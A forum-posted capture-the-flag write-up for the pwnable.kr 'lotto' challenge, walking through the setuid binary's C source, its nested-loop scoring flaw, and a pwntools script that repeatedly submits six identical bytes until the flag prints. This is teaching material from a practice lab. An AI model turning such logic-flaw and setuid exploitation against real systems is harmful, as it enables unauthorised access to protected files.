[Share] pwnable.kr lotto day11
2021-1-13 21:31 3849

lotto

Challenge

Solution

1. List the files


flag is readable only by its owner lotto_pwn and by root, and we log in as lotto, which has no read permission on it. The lotto binary grants read and execute to lotto_pwn and to lotto, and its permission bits include s (the setuid bit), so when user lotto runs it the process gets the effective uid of lotto_pwn. Any child it spawns, such as the /bin/cat in system("/bin/cat flag"), inherits that effective uid and can therefore read flag.

2. Read lotto.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>     /* read() and close(); not in the original listing, added so it compiles cleanly */
 
unsigned char submit[6];
 
void play(){
 
        int i;
        printf("Submit your 6 lotto bytes : ");
        fflush(stdout);
 
        int r;
        r = read(0, submit, 6);
 
        printf("Lotto Start!\n");
        //sleep(1);
 
        // generate lotto numbers
        int fd = open("/dev/urandom", O_RDONLY);
        if(fd==-1){
                printf("error. tell admin\n");
                exit(-1);
        }
        unsigned char lotto[6];
        if(read(fd, lotto, 6) != 6){
                printf("error2. tell admin\n");
                exit(-1);
        }
        for(i=0; i<6; i++){
                lotto[i] = (lotto[i] % 45) + 1;         // 1 ~ 45
        }
        close(fd);
 
        // calculate lotto score
        int match = 0, j = 0;
        for(i=0; i<6; i++){
                for(j=0; j<6; j++){
                        if(lotto[i] == submit[j]){
                                match++;
                        }
                }
        }
 
        // win!
        if(match == 6){
                system("/bin/cat flag");
        }
        else{
                printf("bad luck...\n");
        }
 
}
 
void help(){
        printf("- nLotto Rule -\n");
        printf("nlotto is consisted with 6 random natural numbers less than 46\n");
        printf("your goal is to match lotto numbers as many as you can\n");
        printf("if you win lottery for *1st place*, you will get reward\n");
        printf("for more details, follow the link below\n");
        printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
        printf("mathematical chance to win this game is known to be 1/8145060.\n");
}
 
int main(int argc, char* argv[]){
 
        // menu
        unsigned int menu;
 
        while(1){
 
                printf("- Select Menu -\n");
                printf("1. Play Lotto\n");
                printf("2. Help\n");
                printf("3. Exit\n");
 
                scanf("%d", &menu);
 
                switch(menu){
                        case 1:
                                play();
                                break;
                        case 2:
                                help();
                                break;
                        case 3:
                                printf("bye\n");
                                return 0;
                        default:
                                printf("invalid menu\n");
                                break;
                }
        }
        return 0;
}

Our goal is to reach system("/bin/cat flag"), which requires match to be exactly 6. From the scoring loop:

// calculate lotto score
int match = 0, j = 0;
for(i=0; i<6; i++){
        for(j=0; j<6; j++){
                if(lotto[i] == submit[j]){
                        match++;
                }
        }
}

we can see that every element of lotto is compared against every element of submit, and match++ runs on every equal pair. submit is an unsigned char array holding whatever bytes we send; lotto holds bytes from /dev/urandom reduced to the range 1 ~ 45, so most of them are control characters and the printable ones are the thirteen characters !"#$%&'()*+,- (ASCII 33 ~ 45). The intended check is six comparisons, one per slot, but the nested loops perform 36, so one submitted byte is counted once for every lotto slot equal to it.
If we submit six identical bytes, match becomes 6 times the number of lotto bytes equal to that byte. Whenever exactly one of the six random bytes equals ours, match == 6 and the flag is printed. If two of them happen to match, match is 12 and the == 6 check fails, so we just play again until it hits.

3. Write the exploit

Interaction

Code

from pwn import *

# remote: ssh into the challenge box and start the binary there
# sh = ssh('lotto', 'pwnable.kr', password='guest', port=2222)
# p = sh.process('./lotto')

# local (already on the box): system("/bin/cat flag") uses a relative path,
# so run from a directory that contains flag or a symlink to it
p = process('/home/lotto/lotto')

for i in range(100):
    p.recvuntil(b'3. Exit\n')
    p.sendline(b'1')
    p.recvuntil(b'Submit your 6 lotto bytes : ')
    p.send(b'!!!!!!')                 # six copies of 0x21 == 33, inside 1..45
    p.recvuntil(b'Lotto Start!\n')
    # everything up to the next menu is either "bad luck..." or the flag
    answer = p.recvuntil(b'- Select Menu -', drop=True).strip()
    if b'bad' not in answer:          # bytes, not str, under Python 3
        print(answer)
        break

4. pwn

The flag is inside the red box.
Local run


For a local run you need to create a symlink named flag in the working directory: the binary runs system("/bin/cat flag") with a relative path, so it must be started from a directory that contains flag (the symlink resolves to the real file, which the setuid process can read).


Remote run


Latest replies (4)
#2 pureGavin 2021-1-13 21:50
Prolific like you-know-what
#3 i乂 2021-1-14 21:35
I just started learning and plan to push myself by sharing writeups,
aiming to finish pwnable.kr at one problem a day.
#4 ZyuanI 2021-1-18 00:56
Prolific like you-know-what
#5 i乂 2021-1-18 14:50
ZyuanI: Prolific like you-know-what
Gugugu (slacking off)